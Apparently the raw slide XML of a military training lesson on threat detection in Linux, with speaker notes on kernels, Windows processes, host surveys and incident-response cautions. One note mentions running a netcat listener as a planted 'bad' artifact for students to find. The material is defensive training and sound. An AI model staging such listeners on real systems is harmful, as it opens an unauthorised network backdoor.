            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>deconflicts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the hundreds and even thousands of actions taking place on a computer. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Linux distributions use the same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and will tailor their </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘distribution’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>which means there is similar behavior, but there could be differences between the distributions when it comes to finding/fixing and removing adversaries. Additionally, the added tools that come with each distribution may bring added challenges.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kernels largely stay in sync by adopting major changes from www.kernel.org and creating their own custom patches.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2999109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https://smallbusiness.chron.com/differences-between-linux-security-windows-security-79959.html.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="416995765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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> has two different modes that the process may run as well: User mode and Kernel mode. A lot of user applications may take advantage of published API. Windows API is implemented as a set of DLL, so any process that uses the Windows API uses dynamic linking. The shared libraries that Linux had, Microsoft has a dynamic-link library (DLL) that contains functions and data that can be used by other modules (applications or DLL). The DLL provides a way to modularize applications, so that functionality can be updated and reused more easily. Additionally note the following in the user space: System processes (LSASS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Winlogon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, session manager, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>), services (Svchost.exe, WinMgt.exe, Spoolsv.exe, Services.exe)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> device drives.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>What is not pictured on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>slide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>is the physical hardware that both user and Kernel mode are operating upon. But, the Hardware Abstraction Layer Library provides routines for software that interacts between the hardware and the rest of the OS. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>urpose is to hide hardware complexities and differences from the OS system Kernel. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Source: https://docs.Microsoft.com.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="244474848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example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> of some common things to check when surveying a host. It is going to be important for you to develop your own host survey that is applicable to the overall OS (i.e., Windows versus Linux). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Walk through a few quick checks. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Source: https://www.trustedsec.com/blog/malware-linux/.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="165069497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Due</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to the concern with changing the environment in incident response, its important to have a firm understanding of your capabilities. Knowing how your tools interact and change the environment may be of extreme importance if going after an APT. Knowing what is volatile in the environment is also important.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>It is important to know commander’s guidance or what is driving the find/fix to detect threats during the mission. For example, if law enforcement is directed the response, such as OSI, then </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>chain-of-custody and preserving the data/evidence may become extremely important.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Source: https://community.broadcom.com/symantecenterprise/ communities/community-home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>librarydocuments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>viewdocument</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>DocumentKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=96f09996-0dca-467d-a50c-e9f2fe18681e&amp;Community Key=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>librarydocuments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35125925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type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Review slide.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Image Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1811338" y="944563"/>
            <a:ext cx="3397250" cy="1911350"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42751187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WICNET-U,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> I just run an NC listener as an example of bad to find.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11642142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 slide.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="419908734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 slide.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162339091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commands are not all-encompassing and there are many arguments/flags/options that can be used with these commands. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>When in doubt, students should utilize the man pages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>for assistance.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="263308702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5" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Review slide.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Image Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1811338" y="944563"/>
            <a:ext cx="3397250" cy="1911350"/>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Linux is used throughout the globe for a variety of reasons. It is generally configurable and tailored for its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and there are lightweight versions of Linux available for different uses. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="81399516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type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Review slide.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Image Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1811338" y="944563"/>
            <a:ext cx="3397250" cy="1911350"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="150209878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5" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Questions?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Image Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1811338" y="944563"/>
            <a:ext cx="3397250" cy="1911350"/>
          </a:xfr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References.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71062684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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="208875944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00" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CWU918KD, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Threat Detection: Linux Environment.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Image Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1811338" y="944563"/>
            <a:ext cx="3397250" cy="1911350"/>
          </a:xfr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 slide.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="257392795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 slide.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="901320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type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Review slide.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Image Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1811338" y="944563"/>
            <a:ext cx="3397250" cy="1911350"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4179863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first of two graphics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> that will be referenced multiple times in this lesson. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The graphic shows an example of what a common Linux distribution might look like. During this lesson, we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>will walk through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a few common components of a Linux OS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10957644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esson title slide">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1167342" y="1434178"/>
            <a:ext cx="9859433" cy="91794"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="98000">
                <a:schemeClr val="bg2">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:srgbClr val="AEAEAE"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gradFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effec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eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" b="1" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFA27C"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" b="1" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFA27C"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" b="1" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFA27C"/>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rgbClr val="FFA27C"/>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rgbClr val="FFA27C"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" b="1" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFA27C"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" b="1" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFA27C"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" b="1" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFA27C"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" b="1" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFA27C"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34"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A27C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184324" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2310649" y="6078541"/>
            <a:ext cx="7559040" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00DFCA"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>USAF Weapons School • Nellis AFB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00DFCA"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="184328" name="Group 8"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5337105" y="3817941"/>
            <a:ext cx="1515447" cy="1393825"/>
            <a:chOff x="2418" y="2405"/>
            <a:chExt cx="912" cy="878"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="184329" name="Picture 9" descr="template_ws_patch"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2572" y="2405"/>
              <a:ext cx="617" cy="748"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="184330" name="AutoShape 10" descr="Large checker board"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="2418" y="3043"/>
              <a:ext cx="912" cy="240"/>
            </a:xfrm>
            <a:prstGeom prst="ellipseRibbon2">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 56019"/>
                <a:gd name="adj3" fmla="val 25000"/>
              </a:avLst>
            </a:prstGeom>
            <a:pattFill prst="lgCheck">
              <a:fgClr>
                <a:schemeClr val="tx2"/>
              </a:fgClr>
              <a:bgClr>
                <a:schemeClr val="bg2"/>
              </a:bgClr>
            </a:pattFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184331" name="Rectangle 11"/>
          <p:cNvSpPr>
